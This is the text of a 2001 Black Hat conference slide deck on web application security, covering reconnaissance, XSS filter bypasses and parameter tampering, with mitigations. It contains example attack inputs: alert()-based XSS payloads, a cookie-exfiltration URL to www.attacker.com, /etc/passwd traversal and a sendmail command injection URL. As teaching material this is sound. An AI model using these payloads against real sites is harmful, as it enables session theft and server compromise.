Web Application Security: The Land that Information Security Forgot

BlackHat Amsterdam 2001
Web Application Security
The Land that Information Security Forgot.
Presenter: Jeremiah Grossman
Copyright 2001 WhiteHat Security All Rights Reserved

Topics
Web Application Security Landscape
Common Web Application Security Mistakes
Web Application Attack Methodologies
2001 © WhiteHat Security, Inc.

Topics
Web Application Attack Methodologies
Information & Discovery
Input Manipulation & Parameter Tampering
Cross-Site Scripting
System Mis-Configuration

But Why!?
Easiest way to compromise hosts, networks and
users.
Widely deployed.
No Logs! (POST Request payload)
Incredibly hard to defend against or detect.
Most don’t think of locking down web applications.
Intrusion Detection is a joke.
Firewall? What firewall? I don’t see no any firewall.
Encrypted transport layer does nothing.
Best of all, no one is looking anyway.

How much easier can it get!? Oh right. Unicode 2001 © WhiteHat Security, Inc.

Web Application The Simple Definition
A web application or web service is a
software application that is accessible
using a web browser or HTTP(s) user
agent.

Web Security Layers 2001 © WhiteHat Security, Inc.

The Implementation
Entertainment
Message Boards
WebMail
Guest Books
Voting Polls
E-Commerce Shopping Auctions Banking Stock Trading Just Plain Crazy Printers PDA’s Cell Phones System Configuration .NET/Passport 2001 © WhiteHat Security, Inc.

Firewall 2001 © WhiteHat Security, Inc.

Common Web Application Security Mistakes 2001 © WhiteHat Security, Inc.

Trusting Client-Side Data
DO NOT TRUST CLIENT-SIDE DATA!
Trusting Client-Side Data is #1 cause of vulnerabilities.
Identify all input parameters that
trust client-side data.

The Level of Trust
E-Commerce Shopping
Numbers
<input type=hidden value=2149.37> 2149.00
Too much for a new VAIO!
<input type=hidden value=2.99> 2.99
Now On Sale!

The Level of Trust
Searches/Queries/Templates
Path
http://foo.com/cgi?val=string&file=/html/name.db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd

Unescaped Special Characters
! @ $ % ^ & * ( ) -_ + ` ~ | [ ] { } ; : ' " ? / , . > <
Check for:
Unescaped special characters
within input strings

HTML Character Filtering
Proper handling of special characters
> => >
< => <
" => "
& => &
Null characters should all be removed. %00

More mistakes…
SUID (Does a web application really need root?)
Authentication mechanisms using technologies such
as JavaScript or ActiveX.
Lack of re-authenticating the user before issuing new
passwords or performing critical tasks.
Hosting of uncontrolled data on a protected domain.

Information & Discovery
Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance

Spidering/Site Crawling
Site Map
Service Map
Documentation
Hidden Services
CGI's and Forms
Email addresses
Tools: WGET http://www.gnu.org/software/wget/wget.html 2001 © WhiteHat Security, Inc.

Identifiable Characteristics
Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages
Enormous wealth of information about process flows, debug command, system types and configurations.

Error and Response Codes
HTTP Response Headers
Server: IBM/Apache 1.3.19
Cookie Characteristics
Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent

Commonly referred to as “forced browsing” or “CGI Scanning”.
Directory Browsing Index Listings
http://www.foo.com/dir3/dir2/dir1/file.html
Try:
http://www.foo.com/dir3/dir2/dir1/
http://www.foo.com/dir3/dir2/
http://www.foo.com/dir3/
Tools: Whisker
http://www.wiretrip.net/

Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs

Network Reconnaissance
WHOIS
ARIN http://www.arin.net/whois/index.html
Port Scan (Nmap) http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING) http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)

Input Manipulation Parameter Tampering "Twiddling Bits."
Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers

Cross-Site Scripting Bad name given to a dangerous security issue
Attack targets the user of the system rather
than the system itself.
Outside client-side languages executing within
the users web environment with the same
level of privilege as the hosted site.

Client-Side Scripting Languages
DHTML (HTML, XHTML, HTML x.0)
Opens all the doors.
JavaScript (1.x) Browser/DOM Manipulation
Java (Applets) Malicious Applets
VBScript Browser/DOM Manipulation
Flash Dangerous Third-Party Interactivity
ActiveX Let me count the ways…
XML/XSL Another Door Opener
CSS Browser/DOM Manipulation

Accessing the DOM & Outside the DOM
Document Object Model (DOM)
Client-Side languages possess an enormous amount of power to
access and manipulate the DOM within a browser.
Complex & diverse interconnections create an increased the level of
access within the DOM.
Increased level of access to read & modify DOM data ranging
anything from background colors, to a file on your systems, and
beyond to executing systems calls.

Authentication/Authorization “Hand in the cookie jar.”
Cookies are restricted to domains (.acme.com)
Uncontrolled data on a restricted domain can access
the cookie data.
JavaScript Expression: "document.cookie"
window.open
document.img.src
Hidden Form Submit
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
Cookie data is passed to a CGI through a GET request to a off
domain host.

The Scenarios
Trick a user to re-login to a spoofed page
Compromise authentication credentials
Load dangerous of maliscious ActiveX
Re-Direct a user or ALL users
Crash the machine or the browser

CSS Danger “The Remote Launch Pad.”
Successfully CSS a user via a protected domain.
Utilizing a Client-Side utility (JavaScript, ActiveX,
VBScript, etc.), exploit a browser hole to download
a trojan/virus.
User is unknowingly infected/compromised within
a single HTTP page load.
ActiveX Netcat Anyone?

Dangerous HTML “HTML Bad”
<APPLET> Malicious Java Applications
<BODY> Altering HTML Page Characteristics
<EMBED> Embedding Third-Party Applications (Flash, etc.)
<FRAME> Directly calling in other uncontrolled HTML
<FRAMESET> Directly calling in other uncontrolled HTML
<HTML> Altering HTML Page Characteristics
<IFRAME> Directly calling in other uncontrolled HTML
<IMG> SCRing Protocol attacks and other abuses
<LAYER> Directly calling in other uncontrolled HTML
<ILAYER> Directly calling in other uncontrolled HTML
<META> META Refreshes. (Client-Redirects)
<OBJECT> ActiveX (Nuff Said)
<SCRIPT> JavaScript/VBScript Loading
<STYLE> Style Sheet and Scripting Alterations

Dangerous Attributes “Attributes Bad”
ATTRIBUTE DANGER LIST
(Any HTML Tag that has these attributes)
STYLE
SRC
HREF
TYPE

Filter Bypassing "JavaScript is a Cockroach"
There are all kinds of input filters web applications
implement to sanitize data.
This section will demonstrate many known ways input
filter's can be bypassed to perform malicious functions
such as, cross-scripting, browser-hijacking, cookie theft,
and others.
Client-Side Scripting (CSS) attacks require the execution
of either, JavaScript, Java, VBScript, ActiveX, Flash and
some others.
We will be assuming that these web applications accept
HTML, at least in a limited sense.

Testing the Filters
Submit all the raw HTML tags you can find, and then
view the output results.
Combine HTML with tag attributes, such as SRC,
STYLE, HREF and OnXXX (JavaScript Event
Handler).
This will show what HTML is allowed, what the
changes were, and possible what dangerous HTML
can be exploited.

SCRIPT TAG
Description: The script tag is the simplest form of
inputting JavaScript
Exploit:
<SCRIPT>alert('JavaScript Executed');</SCRIPT>
Solution: replace all "script" tags.

SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the
expression entered after the colon. Netscape Tested.
Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');">
Solution: Replace "javascript" strings in all SRC & HREF
attributes in HTML tags with another string.
Exp: <IMG SRC="java_script:alert('JavaScript Executed');">
will render this script useless.
Further Information:
Any HTML tag with a SRC attribute will execute this script on
page load or on link activation.
As a further protocol pattern matching, keywords "livescript" and "mocha" must be
also replaced for the hold the same possibilities.
*** Netscape code names ***

SRCing JavaScript Protocol w/ HTML Entities
Description: As another derivative of the previous, Decimal HTML entities within these
strings can cause filter bypass.
Exploit:
<IMG SRC="javasc ript:alert('JavaScript Executed');">
Replacement of entities 10 - 11 - 12 - 13 will also succeed.
Hex instead of Decimal HTML entities will also bypass input filters and execute.
<IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');">
As well as placing multiple ZERO's in front.
<IMG SRC=javasc
ript:alert('JavaScript Executed');>
Solution:Filter these entities within the string then do your further pattern matching

AND CURLY
Description:
Obscure Netscape JavaScript execution line. Exact syntax is
needed to execute.
Exploit:
<IMG SRC="&{alert('JavaScript Executed')};">
Solution:
<IMG SRC="XXalert('JavaScript Executed')};">
or something similar will nullify the problem.

Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit:
<style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be fine.
Exploit: Import dangerous CSS.
<STYLE type=text/css>
@import url(http://server/very_bad.css);
</STYLE>
Solution: Filter and replace the "@import“
Exploit: Import a JavaScript Expression through a style tag.
<style TYPE="text/css">
@import url(javascript:alert('JavaScript Executed')); IE HOLE
</style>
Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.

Using CSS
Click to Execute
User must click on a link to execute the script.
(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
Mass Injection
All user viewing the page execute the script.
(Guest Books, Message Boards)
Post a JavaScript onto a board
Message <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>

Using CSS
Directed Injection
Soon as user load the page, script executes.
(WebMail, HTML Mail, Messaging)
Send an email with…
HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
Holding the door open
(FeedBack, Profiles Pages, anything persistent…)
Load HTML Page with sourced scripts.
<LAYER SRC=“javascript.js”></LAYER>

Twiddling Bits
OS Commands
Meta Characters
Path/Directory Traversal

Power of the Semi-Colon piping input to the command line.
OS Commands
http://foo.com/app.cgi?email=none@foo.com
Append:
http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd
Piping:
http://foo.com/app.cgi?email=none@foo.com+|+less
Re-Direct:
http://foo.com/app.cgi?email=none@foo.com+>+/

Power of Special Characters piping input to the command line.
Meta Characters
http://foo.com/app.cgi?list=file.txt
Altered:
http://foo.com/app.cgi?list=*

Power of the Dots and Slashes piping input to the command line.
Path Directory Traversal
http://foo.com/app.cgi?directory=/path/to/data
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd
Double DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data....//….//….//etc/passwd

More Filter Bypassing
Method Alteration (HEAD, PUT, POST, GET, ect.)
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.

More bits…
Hidden Form Field Manipulation
HTTP Headers (Cookies, Referers…)

System Mis-Configurations “patches, patches, and more patches…"
Vendor Patches
Default Accounts
Check:
Web Server permission by directory browsing
Software version from Discovery
Known default accounts in commercial platforms
BugTraq
Anonymous FTP open on Web Server

Other Dirty Tricks “Abuse can be far more time consuming, costly and dangerous”
Mass Account Lockout
Attacks against brute force
3 Time Failure Lock-Out Rule
Purposely fail the 3 attempts again thousands of accounts. If the login is sequential, even better.

Other Dirty Tricks “Abuse can be far more time consuming, costly and dangerous”
Brute Force/Page Sequencing
Attacks against process flow
Use 1 0r 2 pieces of data to get the rest.
Slowly brute force the process for data
aggregation.

Thank You BlackHat and Attendees Questions?
Jeremiah Grossman
[email_address]
WhiteHat Security
All presentation updates will be available on
www.whitehatsec.com

Web Application Security: The Land that Information Security Forgot

by Jeremiah Grossman on Jul 15, 2010

Accessibility

Categories

Tags

Upload Details

Usage Rights

Statistics

Web Application Security: The Land that Information Security Forgot — Presentation Transcript